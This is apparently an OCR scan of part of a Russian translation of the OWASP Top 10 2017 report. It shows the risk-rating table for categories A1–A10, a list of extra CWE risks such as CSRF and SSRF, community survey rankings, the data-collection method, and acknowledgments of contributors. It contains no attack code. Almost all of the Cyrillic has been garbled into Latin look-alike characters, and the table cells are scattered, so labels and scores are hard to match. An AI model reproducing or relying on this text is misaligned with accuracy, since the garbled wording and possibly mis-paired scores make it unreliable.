npMMenaHMe: AaHHbiM noAxoA He ynMTbiBaeT mctohhmkm yrpo3, a Taxxe TexHMnecxMe ocoOeHHOCTM OTAenbHbix 
npMnoxeHMM. J~Ik)6om m3 stmx cf)aKTopoB MOxeT b 3H3HMTenbH0M CTeneHM noBnMHTb Ha oOLAyx) BeponTHOCTb oOHapyxeHMn m 
axcnnyaTauMM 3noyMbimneHHMKOM yn3BMMOCTM. KnaccMcjDMxauMn Taxxe He yHMTbiBaeT peanbHbie nocneACTBMn A-rm 
6M3Heca. Kaxnan opraHM3aiiMn nonxHa caMa pemMTb Hacxonbxo He6e3onacHbiMM MoryT 6biTb ee npMnoxeHMn m API c 
yneTOM cnoxMBWMxcn TpaAMUMM, OTpacnM npMMeHeHMn m hopm3tmbhom 6a3bi. B 3aAanM Ton-10 OWASP He bxoamt aHann3 
yrpo3 unn KOHxpeTHOM opraHM3auMM. 

Hnxe npeACTaBneH pacneT CTeneHM onacHOCTM A6:2017-HexoppeKTHOM HacTpoMKM napaMeTpos 6e3onacHQCTM . 
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CBOflHaa Ta6jinu;a yrpo3 Ton- 10 

Ta6nnua Hi/ixe coAepxm CBOAHyto MHc|DopMa 141/1 kd o Ton-10 yrpo3 6e3onacHOCTn npi/inoxeHi/m 2017 r, a TaKxe cfcaKTopbi pi/iCKa, 
Ha3HaHeHHbie p,nn KaxAon M3 yrpo3. 3 th c[)aKTopbi onpeAennnncb Ha ocHOBe AOCTynHon CTaTncTi/iKi/i 1/1 onbua KOMaHAbi Ton-10 
OWASP. MTo 6 bi paccnmaTb pmckh AJifl KOHKpeTHoro npi/moxeHnn \ahia opraHH 3 aunn, HeoOxoAHMO onpeAenHTb cneunct)HHHbie aji n 
hi/ix HCTOHHHKH yrpo3 m nocneACTBi/in Arm 6H3Heca . flaxe Kpi/iTi/inecKi/ie HeAOCTaTKi/i 110 MoryT He npeACTaBnmb cepbe3H0M 
onacHOCTi/i, eonn OTcy tctB y kdt hctohhmkm yrpo3 iahia nocneACTBnn Rnn 6i/i3Heca ABJimoTcn He3HaHHTenbHbiMM txnn 
paccMaipMBaeMbix aKTi/iBOB. 


yrpo 3 ti 

Si ^ 1 BeKTOpBl i 

/N aTaK 

Mctohhmkm CnoxHOCTb 

yrpo 3 SKcnnyaTauMM 

> 1 ■ Vm m ^ 

HeflOCTaTKM ^ 
6 e 3 onacHOCTri 

" ■ • riOCJieACTBMfl 

ypoB. 

onacH. 

PacnpocTp 

CnoxHOCTb 

►aHeHHOCTb_ofiHanvxeHMq_ 

flJW 

TexHHnecKne 6 n 3 Heca 

A 1 : 2017 -BHeflpeHne 

SaBMCMT 

OTnpMJl. 

nPOCTO: 3 

PACnPOCTP:2 

flPOCTO: 3 

TfDKEJlblE: 3 

3 aBMCMT 

OTnpMJl. 

8.0 

A 2 : 2017 - 

AyTeHTMc|DMKauMyi 

3 aBMCMT 

OTnpMJl. 

nPOCTO: 3 

PACnPOCTP:2 

CPEflHE :2 

TfDKEJlblE: 3 

3 aBMCMT 

OTnpMn. 

7.0 

A 3 : 2017 -Pa 3 rjiaiueHMe 

AaHHbix 

3 aBMCMT 

OTnpMJl. 

CPEflHE :2 

OM. PACnPOCTP:3 

CPEflHE :2 

TfDKEJlblE: 3 

3 aBMCMT 

OTnpMn. 

7.0 

A 4 : 2017 -BHem. cym-TM 
XML(XXE) 

3 aBMCMT 

OTnpMJl. 

CPEflHE :2 

PAd1POCTP:2 

flPOCTO: 3 

TJTOEJlblE: 3 

3 aBMCMT 

OTnpMn. 

7.0 

A 5 : 2017 -HeflOCTaTKM 
KOHTpojia AOCTyna 

3 aBMCMT 

OTnpMJl. 

CPEflHE :2 

PACnPOCTP:2 

CPEflHE :2 

THXEJlblE: 3 

3 aBMCMT 
ot npMn. 

6.0 

A 6 : 2017 -HeKopp. HacTp. 
6 e 3 onacHOCTM 

3 aBMCMT 

OTnpMJl. 

nPOCTO: 3 

OM. PACnPOCTP: 3 

nPOCTO: 3 

yMEPEHHblE: 2 

3 aBMCMT 

OTnpMn. 

6.0 

A 7 : 2017 -MexcaMTOBoe 
Bbino/iHeHMe cueHapneB 
(XSS) 

3 aBMCMT 

OTnpMn. 

flPOCTO: 3 

OM. PACflPOCTP: 3 

flPOCTO: 3 

yMEPEHHblE: 2 

3 aBMCMT 

OTnpMn. 

6.0 

A 8 : 2017 -He 6 e 3 onacHan 

AecepnajiM 3 ai 4 km 

3 aBMCMT 

OTnpMJl. 

CJIOXHO: 1 

PACflPOCTP: 2 

CPEflHE :2 

TFDKEJlblE: 3 

3 aBMCMT 
ot npMn. 

5.0 

A 9 : 2017 -yfl 3 BMM bie 

KOMIlOHeHTbl 

3 aBMCMT 

OTnpMJl. 

CPEflHE :2 

OM. PACnPOCTP:3 

CPEflHE :2 

yMEPEHHblE: 2 

SaBMCMT 

OTnpMn. 

4.7 

A 10 : 2017 -HeAOCTaTKki 
xypHajiMpoBaHMfl m 
MOHMTO pHHra 

3 aBMCMT 

OTnpMJl. 

CPEflHE :2 

OM. PACflPOCTP: 3 

CflO>KHO: 1 

yMEPEHHblE: 2 

3 aBMCMT 

OTnpMn. 

4.0 


flonojiHHTeji£>HLie pwckw , Tpebyiomwe BHMaHUH 

rioMMMO yrpo3, npeACTaBneHHbix b Ton-10, cyinecTByK)T APyri/ie pmcki/i, KOTopbie HeoOxoAHMO oueHMBaTb 1/1 yHMTbiBaTb. 
HexoTopbie n3 hmx yxe oni/icbiBanncb b npoujnbix Bepcnnx Ton-10, a HexoTopbie - HeT, BKnKDnan HOBbie TexHi/iKi/i aiax, KOTopbie 
nonBnnKDTcn nocTonHHO. Huxe nepenncneHbi AononHi/rrenbHbie yrpo3bi 6e3onacHOCTM npi/moxeHMM (no HOMepy OWE), Ha 
KOTopbie Taxxe Heo6xoAmvio o6paTMTb BHniviaHne: 

• CWE-352: MexcanTOBan noAMeHa 3anpocoB (CSRF) 

• CWE-400: HeKQHTponnpveMoe ncnonb3QBaHne pecvpcoB ( n Mpe3MepHoe noipe6neHne pecvpcoB", "0TKa3 b o6cnvxnBaHnn 

npnnoxeHHfl M ) 

• CWE-434: OTcyTCTBHe orpaHHHeHHH Ha 3 arpy 3 Ky foannoB He 6 e 3 onacHoro Tuna 

• CWE-451: HexoppeKTHoe npencTaBneHHe BaxHOH HHcfropiviauHH HHTepfoencoM nonb 3 QBaTenn (floAMeHa HHTepfoenca/Kypcopa 

h nponee) 

• CWE-601: flepeHanpaBneHHe Ha He6e3onacHbiH canT ("OTKpbiTan nepeanpecauHn") 

• CWE-799: HexoppeKTHoe orpaHHHeHHe nacTOTbi B3anM0AeMCTBi/m (flpoTHBOAeHCTBi/ie aBT0MaTH3aunn) 

• CWE-829: Mcnonb3QBaHi/ie fovHKLU/iH HenoBepeHHbix hctohhhkob (Ctopohhhh KOHTeHT) 

• CWE-918: floAMeHa 3anpocoB Ha CTopoHe cepBepa (SSRF) 
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063op 

Ha caMMme OWASP aKTMBHbie ynacTHMK m m nneHbi coo6mecTBa npMHRnM peweHMe o npeflCTaBJiem/in yn3BMMOCTeM, Aeyx 
nepcneKTMBHbix Knaccaxyn3BMMOCTei/i, a Taxxe KJiaccnc|Di/iKa 141 / 11/1 yn3BMMOCTeM Ha ocHOBe KonMnecTBeHHbix m 
KanecTBeHHbix AaHHbix. 


OTpacneBbie uccjieAOBaHkm 

fl/iH i/icc/ieflOBaHi/iH 6bmn OTo6paHbi KaTeropi/ 11/1 yn3BMMOCTeM, KOTopbie paHee CHMTanMCb KaHAMAaTaMM iahia ynoMMHarmcb b 
0T3biBax Ha 2017 RC1 b cnMCKe paccbinKM Ton-10. Mbi ynopHAOHHnHSTM AaHHbie 1/1 nonpocmiM cooOLAecTBO BbiAenmbTon- 
neibipe yH3BMMOCTeM, KOTopbie ctomt BKniOHMTb b Ton-10 OWASP 2017. OnpocnpoBOAnncn co 2 aBrycia no 18 ceHmOpn 
2017 r. Bbino nonyneHO 516 otbotob, no KOTopbiM onpeAermnH KpMTMHHOCTb yn3BMMOCTeM. 


KpMTM^IHOCTfc 

KaTeropnn yHSBMMOCTeri no AaHHLiM nccjieAOBaHMH 

Oi^eHKa 

1 

Pa 3 rnaujeHMe KOHcfDMAeHUManbHbix AaHHbix (HapymeHMe KOHcfDMAeHUManbHOCTM) [CWE-359] 

748 

2 

Yn 3 BMM 0 CTM, CBH 3 aHHbie c LLiMc)DpoBaHMeM [CWE-310/311/312/326/327] 

584 

3 

flecepManM3ai4Mn HeAOBepeHHbix AaHHbix [CWE-502] 

514 

4 

06xoa 3 BTopM 3 ai 4 MM c Mcnonb30BaHMeM xniona nonb30BaTenn (He6e3onacHbie npnMbie 
ccbinKM Ha o 6 "beKTbi* m lloAMeHa nyTM) [CWE-639] 

493 

5 

HeAOCTaTKM xypHanMpoBaHMn m MOHMTopMHra [CWE-223 / CWE-778] 

440 


Pa3maLueHMe nacTHOM MHcfiopMauMM 6e3 coMHeHMn nsnnejcn caMon kpmtmhhom yn3BMMOCTbio, ho OHa rirnub AononHneT 
cymecTByioLAyK) Kaieropmo A3:2017-Pa3rnaLijeHMe KOHcfrMfleHUManbHbixAaHHbix . Ckdas xe moxho OTHecn/i yn 3 BMM 0 CTM, 
CBfi3aHHbie c Lui/icjDpoBaHMeM. He6e3onacHafl Aecepnarm 3 ai 4 njq 6 bma TpeTben no AaHHbiM onpoca, noaTOMy nocne oueHKi/i ee 
onacHOCTi/i OHa 6 bina AoOaBJieHa b Ton-10 b KanecTBe KaTeropmi A8:2017-He6e3onacHaa AecepManM3auna . IIoa neTBepTbiM 
HOMepoM Luni/i y^3BMM0CTM, CBA3aHHbie c KJiHDHaivm nonb30BaTeneM, m mx BKJiKDHMni/i b cm/icoK b Kaieropmo A5:2017-HenocTaTKM 
KOHTpOJIH AOCTyna ■ llpMflTHO BMAeTb, HTO B XOAe MCCneAOBaHM^ BbICOKO OUeHMJIM BaXHOCTb 3TI/IX yfl3BMM0CTeM, nOCKOflbKy ASHHblX 
no hum He MHoro. IlfiTbiMM b cnMCKe LLiJiM HeAOCTaTKM xypHarmpoBaHMB 1/1 MOHi/iTopiiHra, KOTopbie AonojiHmiM Ton-10 KaTeropneM 
A10:2017-HeAOCTaTKMxypHajinpoBaHM5i m MQHi/iTopi/iHra . Haciano BpeMn, xorAa npmioxeHMe aojixho yMeTb onpeAennTb aiaKM, 
perncTpnpoBaTb CBA3aHHbie c hmmm co 6 biTMn, a Taxxe BbiBOAMTb npeAynpexAeHMn m peampoBaTb Ha hmx. 

OTKpbITbIM C60p flaHHblX 

TpaAHUMOHHO, AaHHbie co 6 npajincb m aHann3npoBarmcb Ha ocHOBe nacTOTHOCTM: cxoribKO yn3BHM0CTen 6 bmo oOHapyxeHO b 
npMnoxeHMnx. l/l3BecTH0, hto aBTOMaTM3npoBaHHbie cpeACTBa cooOmaiOT 060 Bcex cjDaKTax oOHapyxeHMH oahom m tom xe 
yH3BMM0CTM, a cneuManMCTbi - 06 oOHapyxeHMM oahom yn3BMM0CTM, ho b pa3Hbix ycnoBMHx. riosTOMy npM aHanM3e ctioxho 
o6"beAMHMTb Aea 3 tmx noAxoAa. 

fljlH BepCMM 2017 K03CtDC|DMUMeHT yH3BMM0CTM paCCHMTblBailCfl Ha OCHOBe KOJIMHeCTBa npMJIOXeHMM, MMeiOLAMX OAHy MJ 1 M 6 onee 
yH3BMM0CTeM onpeAeneHHoro TMna. Bojiblumhctbo AaHHbix npeAOCTaBnnnocb b AByx BapnaHTax: b TpaAHUMOHHOM nacTOTHOM, c 
nOACHeTOM Bcex CjDaKTOB oOHapyxeHMH yfl3BMM0CTM, M HeTpaAHUMOHHOM, C nOACHeTOM npMJIOXeHMM, B KOTOpbIX yH3BMM0CTb 6 blJia 
oOHapyxeHa (oamh mjim 6 onee pa3). HecMOTpn Ha HecoBepmeHCTBO, stot noAxoA no3BonneT cpaBHMTb AaHHbie, nonyHeHHbie 
cneuManMCTaMM c noMOLAbio cnei4ManM3MpoBaHHbix cpeACTB, m AaHHbie, nonyHeHHbie cneuManM3MpoBaHHbiMM cpeACTBa mm c 
ynacTMeM cneuManMCTOB. Heo 6 pa 6 oTaHHbie AaHHbie m pe 3 ynbTaTbi ananma locTvnHbi Ha GitHub . flnn 6 yAyiAMx BepcMM Ton-10 
nnaHMpyeTcn C03AaHMe AononHMTenbHOM CTpyKTypbi, npeAHa3HaneHH0M nnx stmx ueneM. 

B oTBeT Ha npM3biB o c 6 ope MHcjDopMaunn 6 bino nonyneHO 40+ KOMnneKTOB AaHHbix. EonbWMHCTBo M3 hmx ma6htmhho 
nonyneHHbiM b xoAe nepBOHananbHoro c 6 opa (Ha ocHOBe nacTOTHoro noAxoAa), noeTOMy Mbi Mcnonb30BanM AaHHbie TonbKO 23 
MCTOHHMKOB, OXBaTbIBaiOLAMe *114 TbIC. npMnoxeHMM. no B03M0XH0CTM, OpanMCb AaHHbie 3a OAMH TOA OT OAHOrO MCT0HHMK3. 
BonbLiJMHCTBo npMnoxeHMM flBnniOTCfl yHMKanbHbiMM, xoth ecTb BeponTHOCTb noBTopeHMn npMnoxeHMM b exeroAHbix AaHHbix ot 
Veracode. flaHHbie M3 23 KOMnneKTOB 6 binM noAeneHbi Ha nonyneHHbie cneunanMCTaMM c noMOLAbio cneuManbHbix cpeACTB m 
KoecjDctDMUMeHTbi yn3BMM0CTM, nonyneHHbie c noMOLAbio MHCTpyMeHTOB c ynacTMeM cneunanMCTOB. Mbi paccHMTann npoueHTHoe 
cooTHOineHMe npMnoxeHMM, coAepxaLAMx KaxAbiM TMn yn3BMM0CTM. KoecfDctDMUMeHTynsBMMOCTM Mcnonb30Bancn a^i^ pacneTa 
pacnpocTpaHeHHOCTM npM oueHKe onacHOCTM pj\n onpeAeneHMn kpmtmhhoctm yn3BMM0CTM b cnMCKe Ton-10. 
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0praHM3au;ww, npeflocTaBMBiune flaHHLie 

Xotmm no6naroAapnTb opraHM3a uyw\, KOTopbie npeAOCTaBunn cbom AanHbie no yn3BMM0CTflM A.nfl BbinycKa obHOBneHHOM BepcMM 2017: 


ANCAP 

• Contrast Security 

Services bv 

• Purpletalk 

Aspect Security 

• DDoS.com 

• Khallagh 

• Secure Network 

AsTech Consulting 

• Derek Weeks 

• Linden Lab 

• Shape Security 

Atos 

• Easybss 

• M. Limacher IT 

• SHCP 

Branding Brand 

• Edgescan 

Dienstleistungen 

• Softtek 

Bugcrowd 

• EVRY 

• Micro Focus Fortify 

• Synopsis 

BUGemot 

• EZI 

• Minded Security 

• National Center for 

• TCS 

CD AC 

• Hamed 

Cyber Security 

• Vantage Point 

Checkmarx 

• Hidden 

Technology 

• Veracode 

Colegio LaSalle 

• 14 Consulting 

• Network Test Labs Inc. 

• Web.com 

Monteria 

• iBLISS Segurana & 

• Osampa 


Company.com 

ContextIS 

Inteligencia 

• ITsec Security 

• Paladion Networks 



BnepBbie Bee AaHHbie, npeAOdaBJieHHbie Arm BbinycKa Ton-10, a TaKxe normbin cnncox mctohhmkob AQCTvnHbi nv6nnHHO . 


OTflejiBHBie y^acTHUKM npoeKTa 

Xotmm no6/iaroAapMTb OTAe/ibHbixynacTHMKOB npoeKTa, KOTopbie BHec/iM OLu,yTMMbiM BK/iaA b pa6oTy no co3AaHMK)Ton-10 Ha GitHub: 


ak47gen 

• drwetter 

• ilatypov 

• neoOO 

• starbuck3000 

alonergan 

• dune73 

• irbishop 

• nickthetait 

• stefa nb 

ameft 

• ecbftw 

• itscooper 

• ninedter 

• sumitagarwalusa 

anantshri 

• einsweniger 

• ivanr 

• ossie-git 

• taprootsec 

bandrzej 

• ekobrin 

• jeremylong 

• PauloASilva 

• tghosth 

bchurchill 

• eoftedal 

• jhaddix 

• PeterMosmans 

• TheJambo 

binarious 

• frohoff 

• jmanico 

• pontocom 

•thespOnge 

bkimminich 

• fzipi 

• joaomatosf 

• psiinon 

• toddgrotenhuis 

Boberski 

• gebl 

• jrmithdobbs 

• pwntester 

• troymarshall 

borischen 

• Gilc83 

• jsteven 

• raesene 

• tsohlacol 

Calico90 

• gilzow 

• jvehent 

• riramar 

• vdbaan 

chrish 

• global4g 

• katyanton 

• ruroot 

• yohgaki 

clerkendweller 

• grnd 

• kerberosmansour 

• securestep9 


DOOgs 

• h3xstream 

• koto 

• security bits 


davewichers 

• hiralph 

• m8urnett 

• SPoint42 


drkknight 

• HoLyVieR 

• mwcoates 

• sreenathsasikumar 



TaKxe xotmm noGnaroAapMTb Bcex, kto npMCbman cbom OT3biBbi nepe3 TBnrrep, no aneKTpoHHOM noHTe m/im KaKMM-nM6o 
ApyrMM cnocoGoM. 

M KOHenHO xe Mbi xotmm OTMeTMTb flupxa BeTTepa (Dirk Wetter), flxMMa MaHMKO (Jim Manico) m OcaMy 3/ibHarrapa 
(Osama Elnaggar) 3a mx orpoMHbiM BKnaA- Taxxe, HeoueHMMyK) noMomb b co3A3hmm hobom KaTeropMM A8:2017- 
He6e3onacHan necepMajiM3auMn 0Ka3anM KpMC OpoxoctDcf) (Chris Frohoff) m V a6pM3/ib JloypeHC (Gabriel Lawrence). 









